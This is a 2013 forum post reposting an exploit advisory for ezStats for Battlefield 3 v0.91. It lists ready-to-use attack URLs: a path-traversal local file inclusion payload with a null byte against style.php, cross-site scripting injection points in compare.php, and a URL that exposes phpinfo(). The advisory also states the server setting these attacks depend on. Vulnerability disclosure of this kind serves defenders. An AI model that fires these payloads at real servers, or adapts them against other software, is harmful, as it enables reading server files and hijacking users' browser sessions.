Praetorian503 Posted February 6, 2013 Report Posted February 6, 2013 ezStats for Battlefield 3 version 0.91 suffers from cross site scripting and local file inclusion vulnerabilities.#################################################### Exploit Title: ezStats for Battlefield 3 v0.91 Multiple Vulnerabilities### Date: 02/05/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://www.ezstats.org/### Software Link: http://ezstats.googlecode.com/files/ezStats2_BF3_v0.91.zip### Tested on: Linux/Windows #################################################1- Local File Inclusion :http://127.0.0.1/ezStats2/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpghttp://127.0.0.1/ezStats2/admin/stylesheets/style.php?files=../../../../../../../../../../windows/win.ini%00.jpg2- XSS :http://127.0.0.1/ezStats2/compare.php?common=[XSS]http://127.0.0.1/ezStats2/compare.php?rankings=[XSS]############################################# Notes :1- Must be magic_quotes_gpc = Off2- phpinfo() :http://127.0.0.1/ezStats2/admin/apitest.php?info# Greetz to my friendzSource: PacketStorm Quote